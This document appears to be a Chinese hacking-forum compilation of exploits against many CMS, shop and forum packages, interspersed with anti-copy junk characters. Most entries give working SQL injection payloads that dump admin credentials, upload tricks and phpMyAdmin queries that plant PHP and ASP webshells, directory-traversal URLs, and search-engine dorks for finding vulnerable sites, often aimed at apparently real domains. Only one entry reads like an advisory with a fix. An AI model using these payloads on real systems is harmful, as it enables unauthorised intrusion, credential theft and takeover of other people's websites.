启航企业建站系统 cookie注入漏洞通杀所有版本
}1 V# N4 \+ c# W' G4 A4 o+ K) y/ I/ `0 y, W4 ?: \
直接上exploit:
+ o' r! { ]+ y- X; |4 c4 sjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
6 k2 @3 F3 H2 K/ k! itest:http://www.tb11.net/system/xitong/shownews.asp?id=210
% R& G2 k0 K! O# p9 {--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 ^ ^1 k) q% k8 Y$ B+ ?# I# [
Asprain论坛 注册用户 上传图片就可拿到webshell
0 ~ L0 Z$ f/ L. l. g' \9 P, Z7 P8 e; B# U& i
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
; ]) C& I; u' W! o9 Z( t3 u1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
7 }3 P+ Y& `2 E U" V* R3 |2.gif 为一小图片文件,一定要小,比如qq表情图片
8 [ m! n+ k8 P( M' ?% x% p9 \1 t3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用) }! m! A' V7 y: x6 V& M
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
0 ^6 k$ N- V7 E/ S, \5.q.asp;.gif- x5 m W! V3 w9 u0 r
google:Powered by Asprain' K, o2 g& i* ^# m
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 {8 \# Y7 N5 b
$ T7 Z1 E& [" ^! A! \7 `ShopNum1全部系统存在上传漏洞。: S7 B; Y" |. Q( b; b% a
* @6 v a# R9 R8 Y: N. {1 t& b& f首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
+ D; i# u- y/ o% X按说明 提示登录后台。。
. n: K: g$ }, f, a在后台功能页面->附件管理->附件列表6 n1 n; t) z& ^. @
可以直接上传.aspx 后缀木马
: r: \2 f) p" L; }/ x0 s/ L5 _+ O5 Lhttp://demo.shopnum1.com/upload/20110720083822500.aspx
. | u+ {7 \! l4 W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; b7 q8 x( u3 D N# N
- q, U v! C! ]6 X牛牛CMS中小企业网站管理系统 上传漏洞* V! R5 t; M7 ^$ }/ ?) \" Y
8 \, @8 Y. M* [, Q7 @2 @+ x' D
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
: ^6 v( z/ j9 y S4 h; n后台:admin/login.asp/ f' X. H& k. D/ `4 z7 v6 j# w+ \) ^
ewebeditor 5.5 Nday. B- j0 V! |- Y3 i6 e* O
exp:
x& P3 q1 I3 l! q0 a<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?2 B0 ?4 _$ U% F; V0 k: B' y# a
<input?type=file?name=uploadfile?size=100><br><br>?
4 c- i! B) v- o* e$ i2 ?! q6 }( K<input?type=submit?value=upload>?
8 Z0 c1 n7 j, n; o* E</form>
/ t4 t" b% r: c) l! Pps:先上传小马. e" e& `: V$ a9 g" r
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏7 {, m* Y/ Z, D! a) J9 {( E
. g" H& b0 A/ ^* @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 T* `! z: ]% a0 q% f F3 h+ A6 f( c5 u
YothCMS 遍历目录漏洞
' _# T2 x% P+ D* X$ ^- _2 b# z
6 ~% F6 M# t0 v( I* ]优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。& b: W' k+ w) E5 r$ @) G& Q: l
默认后台:admin/login.asp6 p. R) j8 k7 ?0 C8 n
遍历目录:5 T, k6 M/ }1 A4 ]1 @# Q6 }
ewebeditor/manage/upload.asp?id=1&dir=../# B6 z$ O2 A! e7 v/ b# k0 M1 U4 O
data:3 K9 |4 [2 D$ S, D8 L! o7 x
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
* \9 U$ f/ p" K+ ?3 V--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ [1 J: z" o' q
" ~! w. Y5 Q: O* T* b. INet112企业建站系统 1.0
5 M( m# {2 e) I5 k- R/ L/ R
* C0 H! v4 n4 D/ R3 K源码简介:
( g1 E" k% C& \$ a! bNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。$ E. F' b9 l% x, X) [$ H5 }
添加管理员:# X0 P2 Y ]; U
http://www.0855.tv/admin/admin.asp?action=add&level=2- @# _! J: S( u O* ~) I8 r
其实加不加都不是很重要,后台文件都没怎么作验证。% v( `' S; k2 T2 H x b
上传路径:1 E" y) o7 ?3 b" @
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200! j/ X. r/ i+ G3 X8 n( h
http://www.0855.tv/inc/Upfile.asp?Stype=2
0 B! ]7 @7 d' I: O' I" R9 d怎么利用自己研究。
( C( p4 N/ t4 l+ H- ^2 D o% J遍历目录:
3 K# v+ P( I% y4 A2 ?, ?5 C- M. Shttp://www.0855.tv/admin/upfile.asp?path=../..! |6 F) {, G K
如:
" z- {+ z4 e2 W( U, H4 D1 Vhttp://www.0855.tv/admin/upfile.asp?path=../admin' q( s. [" \/ W0 X: M# e4 F
http://www.0855.tv/admin/upfile.asp?path=../data, Y U+ l$ T; E$ o! x/ ~: F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' _& H0 z$ F R" N6 C
+ b+ h- B- `% z6 [
易和阳光购物商城通杀 上传漏洞
8 w. L# E% W0 l- ? Q7 z* v: ]* F! W+ {5 b. h- F; k2 v
前提要求是IIS6.0+asp坏境。
/ U1 k5 K [$ b6 K( g x7 y2 F漏洞文件Iheeo_upfile.asp 8 K- @2 |. k% z0 K7 X( S
过滤不严.直接可以iis6.0上传
$ Y" b" s' k8 H9 ]7 o把ASP木马改成0855.asp;1.gif
8 Y, J% [' m; y8 [直接放到明小子上传
5 A7 o: S F; C: V& n! {Google搜索:inurl:product.asp?Iheeoid= i( z5 D8 X( z! a; S! H) ~1 P$ S" v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# u" g6 p( U" K' v/ d6 G
: o9 A. ?! O% U' ~; I# R" H5 o
phpmyadmin后台4种拿shell方法# ?$ d% A t) ]
' s& R( z1 `4 R7 r0 B' k( ]* b2 P方法一:
V$ |3 O0 P0 ]2 A& R- JCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
' M0 M2 v) N& W$ ?8 C NINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
; }0 |6 T+ n/ ]" m4 g& Z5 q! G4 MSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';5 D, p$ b7 H/ x! n" R" {; w
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php G$ [: V6 \8 v. l3 P3 {$ q
一句话连接密码:xiaoma
T3 Z1 O$ v3 F方法二:
6 i( Y7 A p2 t5 u( E' {Create TABLE xiaoma (xiaoma1 text NOT NULL);& `5 `+ `2 `& Q' c2 a6 V
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
: P j' M) @6 Iselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
# J2 j/ W4 y6 }Drop TABLE IF EXISTS xiaoma;
) ]2 L; U4 S9 @) p6 H; b4 k方法三:
* i0 ]# q4 V. [5 K ]% C/ k读取文件内容: select load_file('E:/xamp/www/s.php');
2 M) {$ s6 r. V" o* \写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'; u6 T! P6 C( [6 L1 `
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'8 l; I) g1 u; i2 j
方法四:" g: d0 J2 @2 q
select load_file('E:/xamp/www/xiaoma.php');
. {4 M( q( f0 f) F. }0 hselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 P* v) J. ` m* R4 F然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
, J+ s. d; I1 I( ^6 Z e4 r6 Z: P--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; u: e3 M1 W# M2 k3 M& m' K3 V1 b* c8 m
传信网络独立开发网站源码0day漏洞. g' O. ^1 Y" P! b
6 r2 C+ q7 C7 M, B- W
后台system/login.asp7 C8 r2 ]1 q/ S. G, x. |! @
进了后台有个ewebeditor' s! E7 i3 d1 d8 |/ r2 l' ^# p: ^
Google 搜索inurl:product1.asp?tyc=
1 k4 Y: z( r% r0 |$ r7 _) h编辑器漏洞默认后台ubbcode/admin_login.asp& v& ^ }7 T* a/ E6 d3 _7 u |
数据库ubbcode/db/ewebeditor.mdb
# V L! O( \" X) L默认账号密码yzm 1111114 M8 t( J, e2 c7 Z$ i$ f
( u/ p: C1 ^- [8 Z, @, O拿webshell方法
. W/ N& N8 b( d6 V) Q, w4 M9 C登陆后台点击“样式管理”-选择新增样式 0 _$ M* V( i9 Z" y5 c& o
样式名称:scriptkiddies 随便写 ; v7 @( e/ c' C( I z) f; @
路径模式:选择绝对路径 3 `6 z7 B* m7 M7 P
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
) E [" Q: L# `3 |( ~8 P# O) _图片类型比如就是我们要上传的ASP木马格式
5 k( Q. P+ q: v+ e2 N a: A上传路径:/3 }% I5 | t9 U: n I! }- o- s
图片限制:写上1000 免的上不了我们的asp木马* m3 D* l. f5 [( N
上传内容不要写4 k' o! G# N6 N% E* A5 @. g/ f
可以提交了 / y. k' k" Y$ k& k9 i
样式增加成功! ! {; K8 P6 m( X1 f1 [
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 3 w- I! J4 N3 }( W# w& v
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
: J7 }5 o, `* m9 s0 o$ ^( W网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
* R1 C) w( c' y/ O" Q) W: l. M上ASP木马 回车 等到路径
+ q! p" u, V J s. A3 ]2 B
+ b1 B$ P; V5 v# r% Q- N后台:system/login.asp
1 N- E) |, c) o, J% {Exp:8 d$ C: e2 }( K
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
& W- D0 K# o; m+ e) @测试:. E5 b" y7 V3 ~& h
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
# n* u8 i" D) O1 R7 H7 i% \http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master2 E* P% ^, j' |6 s! I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" L8 W8 M; o; }0 O) u( @5 T
% f% r! ?5 _1 N' Y( J
foosun 0day 最新注入漏洞0 c2 ]. }, Y* b
+ P% z. w( S6 S3 h+ L! C
漏洞文件:www.xxx.com/user/SetNextOptions.asp
5 Y( @4 }8 {8 a! l. _" J利用简单的方法:( ?+ O* l6 {3 {( t ^& J6 o
暴管理员帐号:9 h+ |( j# b: P( Z
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
( y- O' f% ~3 U+ {! S5 @, O& J暴管理员密码:
4 x% y+ H% q1 M% e1 j1 S0 |http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
7 y: P0 J1 S( z, i1 a( t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) `: q- X+ g/ _. x) T7 x+ w4 [2 b6 T- r1 z
网站程序的版权未知!$ ?! a& v" t9 }& q# A* c
: t, j0 q) N. l/ ~/ @默认网站数据库:$ _& O/ j* ^- S0 g- |' @0 V+ B
www.i0day.com/data/nxnews.mdb$ o$ ?7 e( |9 k$ S
ewebeditor 在线编辑器:
4 ? x7 u3 u/ a, G7 {编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
( c7 m# T6 f( w0 W/ D I. ]5 }登录地址:ewebeditor/admin_login.asp
$ L( h. [' R( K' a8 }默认密码:admin admin
6 H9 ?1 I) q; H, C- v; Y. M N9 Q登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data4 n0 k! c1 C4 V& N6 E
6 h i7 i0 E1 P% `8 q7 S% E! l, BSql注入漏洞:
e, @ Q3 R4 l7 Thttp://www.i0day.com/detail.asp?id=12, o% V' l2 j5 a) ]# j* e
exp:) r& x# I% N1 h+ n/ r3 {! s
union select 1,admin,password,4,5,6,7,8 from admin
+ P# j( ^" F* p6 F9 Q( G爆出明文帐号/密码& `& U- h4 j# k# G; ?; r' G. R
9 y; G* j: M; k0 L, G7 X3 @! |
上传漏洞:. {9 }% w* |) r5 s. K* i$ |; i
后台+upfile.asp6 b% q5 S$ z3 y: G- W6 {5 z* F
如:' {# w8 |% R3 e' I1 h
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
+ M8 v$ O& Z& [5 \4 tshell的地址:网址+后台+成功上传的马
& ^, S3 G- P/ Z$ A3 T3 Mgoogle:inurl:news.asp?lanmuName=
3 I+ y t5 R9 T------------------------------------------------------------------------------------------------------------------------------------------------------------------------. A: i2 V/ y: j
" C' n9 n# Y# v9 ]( m: ?3 kdedecms最新0day利用不进后台直接拿WEBSHELL
* m) D& S* r# ?* {) G# @" W
- n3 v8 g/ g+ |1 H5 e3 w+ D. q拿webshell的方法如下:
4 z1 K @0 H( z, S/ d) V+ q网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.% M. H1 p) T3 M! ~; k/ @
前题条件,必须准备好自己的dede数据库,然后插入数据:" @" x {0 \7 R- T' f8 {
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
# z* H! ~( j7 n& u2 Z1 D8 I' ?# W; _0 F! z
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。0 ~/ d( {# v H A. P
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">1 ^9 ?$ M' b: n, J: {
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />) C4 Q/ ]4 I$ Q0 X4 s6 D$ B
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />: Z% _) D) n: ?, s
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />. D" ]# H: W6 z8 c0 U4 D
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 n9 c! |' D- }# w: ?. L<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />& V4 ~8 l: {, I9 N' x" B7 n
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br /> T7 g2 I" Y. s. R2 O
<input type="text" value="true" name="nocache" style="width:400">
+ g5 @0 K( A* S9 a3 Y3 L' A N<input type="submit" value="提交" name="QuickSearchBtn"><br />; c* n F: s. A6 E6 h( H
</form>. _1 v# p5 A3 X0 l% ?+ E. M/ D
<script>' L2 W# c9 N. i& I9 Z' W1 ]8 G9 n. W
function addaction(): j' H1 x7 N; ?! T2 o! @9 E
{
; d% ~3 r v+ ~1 Z- Edocument.QuickSearch.action=document.QuickSearch.doaction.value;
, D% s+ J! Q( Q: W: e; E% Y}
# }7 T: r: ]0 _6 y! a5 X* G</script>9 i5 I( d' _' w1 A9 }& u
-----------------------------------------------------------------------------------------------------------------------------------------------
, @. Y7 u! Q+ o$ F* H4 g0 \6 X6 e- J. s
dedecms织梦暴最新严重0day漏洞- b: |" Z7 z& a7 W
bug被利用步骤如下:& c8 Z6 ~3 _& z6 M. |
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ X& r; u. T" N% x把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
7 N! e2 T9 [# G7 Q6 p1 k-------------------------------------------------------------------------------------------------------------------------------------------
. F. m5 x' O8 B6 c- c8 F' m0 W% {6 j- ~' n
多多淘宝客程序上传漏洞 9 C i5 S3 Z4 } T% h( \
漏洞页面:
. l# P6 a7 s* A m5 iadmin\upload_pic.php# j- L- Q* w- j0 Z+ {
传送门:2 t( O* a; l) F
http://www.www.com/admin/upload_pic.php?uploadtext=slide16 ~% p5 F' U( X- r
PS:copy张图片马 直接 xxx.php 上传抓包地址!6 p% x9 }0 {# O( U( f5 I$ G ]
------------------------------------------------------------------------------------------------------------------------------------------------------' G0 l: N3 K+ ]* j3 s( H5 l5 ~
/ T7 l- K; i+ M& [( l无忧公司系统ASP专业版后台上传漏洞* H% \8 c2 X+ z. \
漏洞文件 后台上传
, a! j2 L5 u( |$ G" t1 C8 radmin/uploadPic.asp! q# p9 D2 W/ S+ @) Z& N ]
漏洞利用 这个漏洞好像是雷池的' B+ w: _& U u
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=15 A2 e5 j6 H* M0 `& F
等到的webshell路径:
: p6 Q$ s; `) G1 _( v8 E/UploadFiles/scriptkiddies.asp;_2.gif
5 ?1 z; I' I% p# D. D f---------------------------------------------------------------------------------------------------------------------------------------------------
+ u0 g9 U1 l5 E2 |& c D+ r q7 N8 j/ A1 J. a
住哪酒店分销联盟系统2010
D( P" G$ E& r. v8 [2 tSearch:" W- z. [" O& j
inurl:index.php?m=hotelinfo5 _; Q/ V, G3 n
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
' g" }, \5 H" Z7 u' n6 J5 T2 \$ ~- d默认后台:index.php?m=admin/login, H9 n$ H& q7 x) \; }
--------------------------------------------------------------------------------------------------------------------------------------------------" p5 G8 v& `% Y! b
; _5 Y1 Y3 c) F5 H5 ginurl:info_Print.asp?ArticleID=
- {0 G" c1 {& q/ H后台 ad_login.asp0 t4 ~; S0 D$ i& Z3 ~
爆管理员密码:4 F* j0 |) y j2 U9 k
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin: M* M4 e+ x2 L% ?3 y
------------------------------------------------------------------------------------------------------------------------------------------------------------: J% M: @/ P6 ?! |7 r
, p$ Q) K. N+ f
搜索框漏洞!, _/ M9 _( Q8 ^1 x8 x
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
( Z2 m! a8 K3 o3 D& y--------------------------------------------------------------------------------------------------------------------------------------------------------, r( N1 P) A5 U- f: V2 }' \
0 X" P4 u0 b4 _6 J1 c' t5 B* m
关键字:
8 }) C( w( `/ q: z5 N1 R8 T W( ^inurl:/reg_TemletSel.asp?step=28 S$ _. O7 B/ R1 m7 X ]
或者
" r: ^* f) M( A, f: i, }电子商务自助建站--您理想的助手
0 O. u( U S. }6 O$ i-------------------------------------------------------------------------------------------------------------------------------------------------
' {/ Y+ J: O. u! e: [0 L3 [5 x Y% H- S$ V' }% I- f
iGiveTest 2.1.0注入漏洞6 s0 l5 N. Y% Y. G8 J) B5 T: a: k
Version: <= 2.1.02 m0 x1 N7 A- `+ q# |
# Homepage: http://iGiveTest.com/
1 P- n& g1 {3 s# O, I/ Z谷歌关键字: “Powered by iGiveTest”
! p `% l& E; U$ c! T随便注册一个帐号。然后暴管理员帐号和密码9 K0 J. `* Y! X, P* ^
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1# W( M, ~5 d# V1 M# F2 I
------------------------------------------------------------------------------------------------------------------------------------------------ e( T# A2 _/ T: P8 x
I/ q; j/ I0 y7 E3 C' l* V! i
CKXP网上书店注入漏洞% A/ ^# F& N! R! M: K z& Z
工具加表:shop_admin 加字段:admin+ L* ^/ T1 A: L" M) L9 ~/ }- j
后台:admin/login.asp / o% c, O8 I3 s
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/& `, y: K E) W5 z0 p5 T
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
/ q7 a. U1 F0 K% \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- A; x3 B5 V5 T2 N1 \' \6 R* O8 b$ j2 n& O% x% Y( {6 f6 n. A5 }1 U1 h
段富超个人网站系统留言本写马漏洞5 S7 \5 P3 L( s" B! u
源码下载:http://www.mycodes.net/24/2149.htm
: K& ?/ {9 r. ?' v7 X" ~9 t: Aaddgbook.asp 提交一句话。
" x" r$ T& V; V+ v连接: http://www.xxxx.tv/date/date3f.asp
$ ]. H+ w: {" _' v' Rgoogle:为防批量,特略!
+ k0 I( J; H" L! h-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ u4 Q7 X B) z8 a8 ?3 c# q& O8 O0 ~3 T7 a2 B( @( T
智有道专业旅游系统v1.0 注入及列目录漏洞. N6 }6 T8 h7 [9 V
默认后台路径:/admin/login.asp
' F1 n2 f, [8 u9 P: l4 |默认管理员:admin
# N5 ?9 ~$ g0 o& W默认密码:123456/ Q2 C: R. y$ E7 f8 L( f
SQL EXP Tset:
7 F7 v7 Q" ]+ A5 }; e& \1 K0 ehttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
4 ~4 }! ]. ?- M. b7 N* \& V- m/ _------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 S/ Y" M1 C$ q3 [) @; T G) Y
: W( j7 B6 g6 e7 F! y+ D) G
ewebeditor(PHP) Ver 3.8 本任意文件上传0day# u1 y. W U: |5 v" L
EXP:
0 k% h6 N$ y A% q<title>eWebeditoR3.8 for php任意文件上EXP</title>
1 f4 O% |1 ?2 c1 w<form action="" method=post enctype="multip. q$ G0 k% | N' N7 P( [" G. Y+ e
art/form-data"> ) ]2 n& L8 W: i+ o+ Y& B0 Y( g1 ^
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 2 u9 S& ?- G( j7 f. c5 R. |
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> * U w0 K, I# U$ h0 \- | z
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> % v% e0 P- ^. b: O4 H
file:<input type=file name="uploadfile"><br>
, D5 u+ w, g0 `) T4 W( {<input type=button value=submit onclick=fsubmit()>
) m0 W" n# w1 x/ P" d</form><br>
i4 s2 h& P" F% O: h<script> # z% S9 S- ~2 F0 T; U% K4 V9 K
function fsubmit(){ 6 K0 z; }1 w8 |: Z
form = document.forms[0];
& T% I0 W; Y# p# pform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 2 g6 Q& D, w4 I! x) X6 A$ H" R# n
alert(form.action);
+ V p0 g# ~+ A% Dform.submit();
# H# B! _, n2 ]4 c0 v3 Q# ~" V}
/ z9 Y( p% j7 Z' ^</script>
2 x2 |- X) `% W, I, j注意修改里面ewebeditor的名称还有路径。
3 | B- X0 v& h7 [! l& C# T5 W8 C---------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 `$ T& `# Z/ Q2 ~; S* _: o* m5 H6 Y
$ ^/ z9 b1 j& l! g
提交’时提示ip被记录 防注入系统的利用
' w( e* C& P* l0 C2 q4 l. }网址:http://www.xxx.com/newslist.asp?id=122′
$ h. k$ o; Y* f Y$ K提示“你的操作已被记录!”等信息。
0 g! H1 L6 d1 q利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。9 e! q/ n5 P1 o. s2 ~$ }6 W
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 [$ O9 Z( g, D: ^- ^$ b N
/ e1 S$ ~6 k$ M6 M$ o西部商务网站管理系统 批量拿shell-0day# i3 [2 W: m- t: R
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
8 l1 G, j( u- o2 K# e1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
4 U" A, Q+ X. F" L2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
2 |& O: s3 o9 Q2 L. R2 P3 E# ^ @2 K. i3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
' N' Y2 h, s- }6 ~/ F8 x, V---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# P6 C3 Y6 S9 K5 ~
5 ^- V) C1 V5 qJspRun!6.0 论坛管理后台注入漏洞 A% p+ Q' u* r& m$ N
8 `# k; d0 ?# y
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:! p! y+ a4 B' c
JspRun!6.0 5 x3 X: }9 q4 S4 X' }/ g
漏洞描述:
% b+ ]9 [$ K! H4 T& ZJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。- F5 o1 N0 c, ~4 P3 l$ j
在处理后台提交的文件中ForumManageAction.java第1940行
- B0 j' M+ @6 ]String export = request.getParameter("export");//直接获取,没有安全过滤
9 M9 L: T% a# B2 w* qif(export!=null){+ c6 M' A, n/ _2 H5 S( e$ I( p+ Q
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
( q$ ` j$ \, ]& r2 yif(styles==null||styles.size()==0){' \' u( V) [1 T, f- v7 a( a F
<*参考( A8 t8 C3 X! I$ d( a$ K: E# ]
nuanfan@gmail.com
; }9 A1 U/ u" N6 [, ^- O*> SEBUG安全建议:
5 j. r9 F5 o1 e- ewww.jsprun.net0 L8 j) c$ m) M4 n
(1)安全过滤变量export
1 P1 k& m8 W. O! \3 m \(2)在查询语句中使用占位符
% |, ^1 ~6 y/ _1 t( Y* B------------------------------------------------------------------------------------------------------------------------------------------------------------------------------* A" T) b/ C2 ] o8 L
0 h2 X, z4 {& Q% e4 P% n$ r乌邦图企业网站系统 cookies 注入
& u; x( f2 Y! g8 [0 {$ i
% b+ [8 x. G6 v$ A' g9 S8 r程序完整登陆后台:/admin/login.asp- k- y9 w8 X# @7 f6 D) L5 N
默认登陆帐号:admin 密码:admin888, T% a3 {; t+ ~1 J5 k9 S
语句:(前面加个空格)' B8 @0 D) O' {$ w
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin7 S7 q! v6 V4 i+ J9 Z
或者是16个字段:
# f& q/ }' f" tand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin) _; _. H4 C" x& {
爆不出来自己猜字段。
4 n% H! n+ d: `注入点:http://www.untnt.com/shownews.asp?=88
* h; s: ^: d; b" `7 I1 g j* O/ ygetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
9 \1 y' w8 Q/ L; y关键字:
' r; r) q# M. ~. Iinurl:shownews?asp.id=% m+ ~" {7 x: D, u
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; p! J* }) p2 a' X# B8 _" `- ^
' _5 n! p0 ?# ?; CCKXP网上书店注入漏洞
4 y: ?) C/ l: g$ d% b- M9 u; X* H$ z' d: G7 { Q# H
工具加表:shop_admin 加字段:admin
7 @8 N* N9 [7 Q9 P& G后台:admin/login.asp & J' _# Z) o6 A& H, f
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
6 r; f. L5 s" n. X, cinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
; c2 J7 [4 S8 `6 M---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! p2 T$ f9 F0 {; W! K+ Z( g. A5 ]2 f, }# V ]0 Y; G- ]
YxShop易想购物商城4.7.1版本任意文件上传漏洞8 s" u$ t J8 A9 D
' C4 J: B0 K2 \ k" @ h: jhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
